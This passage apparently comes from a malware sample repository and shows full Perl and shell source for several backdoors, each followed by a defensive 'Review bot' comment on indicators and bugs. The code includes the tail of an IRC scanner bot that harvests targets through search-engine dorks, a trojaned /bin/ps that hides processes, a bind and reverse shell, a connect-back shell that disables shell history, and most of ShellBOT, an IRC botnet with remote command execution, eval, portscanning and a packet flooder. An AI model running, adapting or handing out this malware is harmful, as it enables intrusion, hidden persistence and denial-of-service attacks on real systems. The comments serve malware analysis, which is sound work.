$html.=&Query("http://de.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=".$dork."&aqp=&aqo=&aqn=&kgs=1&kls=1&filetype=&rc=dmn&swd=&lh=&nbq=50&stq=".$start);
}
while($html =~ m/<span class=ngrn>(.+?)\ <\/span>/g){
if($1 !~ /yahoo/ && $1 !~ /Altavista/){
push(@result,&Links($1,$file));
}
}
return(@result);
}
sub Gigablast(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $max=99;
my $file = "gigablast.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += 1){
$html.=&Query("http://suche.lycos.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&SITE=de&cat=loc&enc=utf-8");
}
while($html =~ m/href=\"(.+?)\"/g){
push(@result,&Links($1,$file));
}
return(@result);
}
sub Msn(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=10;
my $max=100*10;
my $file = "msn.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search.live.com/results.aspx?q=".$dork."&lf=1&rf=1&first=".$start);
}
while($html =~ m/<a href=\"http:\/\/(.+?)\"/g){
$1 =~ /msn/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Ask(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=100;
my $file = "ask.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search.ilse.nl/web?rid=PREV&pagnum=".$start."&search_for=".$dork);
}
while($html =~ m/\">(.+?)<\/a>/g){
$1 =~ /ask/ || push(@result,&Links($3,$file));
}
return(@result);
}
sub Fireball(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=99;
my $file = "fireball.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search-dyn.tiscali.de/search.php?key=".$dork."&collection=de&tiscalitype=web&hits=10&language=de&maxCount=&collapse=on&spell=suggest&pg=".$start."&offset=".(($start-1)*10)."&xargs=");
}
while($html =~ m/onmouseover=\"window.status=\'http:\/\/(.+?)\'/g){
$1 =~ /tiscali/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Alltheweb(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "alltheweb.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
}
while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){
$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Aol(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=100;
my $file = "aol.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://suche.aol.de/aol/search?query=".$dork."&page=".$start."&nt=SG2&langRestrict=2&q=".$dork."&rp=lang_de");
}
while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
$1 =~ /aol/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Query(){
my($link,$timeout)=@_;
my $req=HTTP::Request->new(GET=>$link);
my $ua=LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout($timeout);
my $response=$ua->request($req);
return $response->content;
}
sub Key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/\\/\%5C/g;
$chiave =~ s/,/\%2C/g;
return $chiave;
}
sub GetLink(){
my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
my $link;
my @total;
foreach my $n (@file){
open(F,'<',$n);
while($link = <F>){
$link=~s/[\r\n]//g;
push(@total,$link);
}
close(F);
}
return(@total);
}
sub Remove(){
my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
foreach my $n (@file){
system("rm -rf ".$n);
}
}
sub Links(){
my ($link,$file_print) = @_;
my $host = $link;
my $host_dir = $host;
my @links;
$host_dir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir=&End($host_dir);
$host=&End($host);
$link=&End($host);
push(@links,$link,$host,$host_dir);
open($file,'>>',$file_print);
print $file "$link\n$host_dir\n$host\n";
close($file);
return @links;
}
sub End(){
$stringa=$_[0];
$stringa.="/";
$stringa=~s/\/\//\//;
while($stringa=~/\/\//){
$stringa=~s/\/\//\//;
}
return($stringa);
}
sub Unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ ){
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub GoogleDomains(){
my @dom = ("at","ch","de","fr","gr","nl","pt","co.uk","be");
return(@dom);
}
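Review bot: Every C2 parameter is a literal in the first dozen lines — server `211.21.73.10`, port `6667`, channel `#r4k3t`, nick prefix `UnIx|`, trigger `!scan`, and the second-stage URLs on `www.wauze.de` and `www.malteser-paderborn.de` — and `irc` sends the fixed registration `USER xpl 8 * : By SISTEM`, so these strings plus the channel messages containing `Scansione` are the static and on-wire indicators for this sample. In `scan` the second `my $link` immediately shadows the first, so only the `$spread` URL is ever requested against a found host, and the `SAFE OFF` branch tests `$htmlsite`, a variable that is never assigned, so in practice only the `SAFE ON` message is ever sent. Behaviourally, one `!scan` forks nine children that each page through a search engine with the same query, then up to `$proxy` (30) concurrent children per batch of result hosts, which is a recognisable burst of HTTP from a single host under rotating user agents; the per-engine `google.txt` … `aol.txt` files in the working directory are transient artifacts that `Remove` deletes with `system("rm -rf ".$n)`.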

2114
Perl/Backdoor.Perl.IRCBot.y Normal file


2116
Perl/Backdoor.Perl.IRCBot.z Normal file


40
Perl/Backdoor.Perl.Psesb Normal file

@ -0,0 +1,40 @@
#
# lame tiny easy to use backdoor for ps
#
# the word placed after filterword= will be filtered out of the output of ps
#
# usage:
# # mv /bin/ps /bin/.ps
# # cp ~/psbackdoor.sh /bin/ps
# # chmod a+x /bin/ps
#
# Thats it, have phun scriptkiddies
# The Itch / Bse / g0tr00t
# http://bse.die.ms
# http://www.g0tr00t.net
filterword="su"
originalps=/bin/.ps
tempfile=/tmp/.pstmp
grep=/bin/grep
numlines=0
touch $tempfile
if [ ! -x $originalps ]; then
echo "Error: original ps not found!";
exit 1
fi
if [ ! -w $tempfile ]; then
echo "Error: tempfile handling failed!";
exit 1
fi
$originalps $1 $2 $3 $4| $grep -v $filterword > $tempfile
numlines=`cat $tempfile|wc -l`
numlines=`expr $numlines - 2`
head -n $numlines $tempfile
rm -rf $tempfile
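Review bot: This file is a Bourne shell script, not Perl, so the `Perl/` path misclassifies it: it replaces `/bin/ps` with a wrapper that runs the original from `/bin/.ps`, drops every output line containing `su` with `grep -v`, and prints all but the last two lines of what remains. The artifacts are direct to check — `/bin/ps` being a text script instead of a binary, a hidden `/bin/.ps`, and the transient `/tmp/.pstmp` — and a file-integrity baseline on `/bin` catches the swap outright. Because it forwards only `$1`–`$4`, trims two trailing lines unconditionally and hides anything whose `ps` line merely contains `su` (`sudo`, or any path or argument with that substring), its output differs from the real `ps` in ways a comparison against `/bin/.ps` or `/proc` exposes immediately.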

130
Perl/Backdoor.Perl.RShell.a Normal file

@ -0,0 +1,130 @@
#
# Asmodeus v0.1
# Perl Remote Shell
# by phuket
# www.smoking-gnu.org
#
# (Server is based on some code found on [url=http://www.governmentsecurity.org)]www.governmentsecurity.org)[/url]
#
# perl asmodeus.pl client 6666 127.0.0.1
# perl asmodeus.pl server 6666
#
use Socket;
$cs=$ARGV[0];
$port=$ARGV[1];
$host=$ARGV[2];
if ($cs eq 'client') {&client}
elsif ($cs eq 'server') {&server}
sub client{
socket(TO_SERVER, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$internet_addr = inet_aton("$host") or die "ALOA:$!\n";
$paddr=sockaddr_in("$port", $internet_addr);
connect(TO_SERVER, $paddr) or die "$port:$internet_addr:$!\n";
open(STDIN, ">&TO_SERVER");
open(STDOUT, ">&TO_SERVER");
open(STDERR, ">&TO_SERVER");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(TO_SERVER);
}
sub server{
$proto=getprotobyname('tcp');
$0="asm";
$system='/bin/sh';
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");
print "Asmodeus Perl Remote Shell\n";
system(date);
system("/bin/sh");
close(STDIN);
close(STDOUT);
close(STDERR);
return;
}
}
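Review bot: `server` rewrites `$0` to `asm` on its second line, so the listener shows as `asm` in `ps` while `/proc/<pid>/exe` still points at the perl interpreter; that mismatch, and a `/bin/sh` whose descriptors 0–2 are a TCP socket (both modes `open` STDIN/STDOUT/STDERR onto the socket before `system("/bin/sh")`), are the host indicators. On the wire each session begins with the fixed banner `Asmodeus Perl Remote Shell` followed by the output of `date`. Neither mode checks who is on the other end, and the `return` inside the `for(;$paddr=accept(...);close CLIENT)` loop fires after the first client, so the script serves a single session and then exits.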


@ -0,0 +1,60 @@
use IO::Socket;
#WwW.CoM Security Hackers
#coded bY: MasterKid
#We Are: MasterKid, AleXutz, FatMan & MiKuTuL
#Email: muzicteam2006@yahoo.com
#
#kid@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#kid@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 bY MasterKid of WwW.CoM Hackers SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
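Review bot: The `die print "[-] …"` idiom on the `socket` and `connect` lines dies with the return value of `print` (1), so on failure the script writes the message and then a bare `1 at … line N` rather than the intended text. `use Socket` and `use FileHandle` sit after the first executable statements, which works because `use` is compile-time, but it reads as though the modules were loaded conditionally. For defenders, the session runs `unset HISTFILE; unset SAVEHIST` before `/bin/sh`, so shell history will not record it; the fixed banner `--== ConnectBack Backdoor vs 1.0 bY MasterKid …` on the socket, the preceding `uname -a`/`id`/`pwd` output, and a `sh` whose standard descriptors are a connected TCP socket are the durable artifacts.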



@ -0,0 +1,665 @@
#
# ShellBOT - Atrix Team
#
# 0ldW0lf - oldwolf@atrix-team.org
# - www.atrix-team.org
# - www.atrix.cjb.net
#
# modificado por poerschke
# irc.gigachat.net #spykids
#
################ CONFIGURACAO #################################################################
my $processo = "/hsphere/shared/apache/bin/httpd -DSSL"; # Nome do processo que vai aparece no ps #
#----------------------------------------------################################################
my $linas_max="10"; # Evita o flood :) depois de X linhas #
#----------------------------------------------################################################
my $sleep="4"; # ele dorme X segundos #
##################### IRC #####################################################################
@adms=("poerschke","_CaKe_"); # Nick do administrador #
#----------------------------------------------################################################
my @canais=("#perl"); # Caso haja senha ("#canal :senha") #
#----------------------------------------------################################################
my $nick="spykids"; # Nick do bot. Caso esteja em uso vai aparecer #
# aparecer com numero radonamico no final #
#----------------------------------------------################################################
my $ircname = "rox"; # User ID #
#----------------------------------------------################################################
chop (my $realname = `uname -a`); # Full Name #
#----------------------------------------------################################################
$servidor="irc.gigachat.net" unless $servidor; # Servidor de irc que vai ser usado #
# caso não seja especificado no argumento #
#----------------------------------------------################################################
my $porta="6667"; # Porta do servidor de irc #
################ ACESSO A SHELL ###############################################################
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
###############################################################################################
my $VERSAO = "0.2";
$SIG{"INT"} = "IGNORE";
$SIG{"HUP"} = "IGNORE";
$SIG{"TERM"} = "IGNORE";
$SIG{"CHLD"} = "IGNORE";
$SIG{"PS"} = "IGNORE";
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == "1") {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{"host"} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{"porta"} = "$porta_con";
$irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
$irc_servers{$IRC_cur_socket}{"meuip"} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{""}) if (defined($irc_servers{""}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{"nick"};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp="";
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
}
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\!atrix)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!atrix" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{"nick"} = $meunick;
$irc_servers{$IRC_cur_socket}{"nome"} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=( 44464, 4444, 14589, 666, 6666, 6968, 26092, 530, 46256, 31337,
2222, 3879, 30464, 40193, 36864, 33270, 36864, 40193, 30464,
8008, 1234, 6969, 7788, 1524, 10000, 12321, 43690, 3333,
9999, 8975, 16705, 2313, 21317, 36864, 13330, 58821, 6682, 5678,
45295, 65535, 26112, 7512, 24876, 9191, 5321, 50766, 1492, 12345,
12346, 6969, 6970, 12666, 1666, 80, 21, 23, 25, 110, 5252, 9988,
41254, 5074, 139, 44123);
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => "tcp", Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
}
}
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Média de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^entrar (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
return unless $secv;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diertório inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = "B" x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
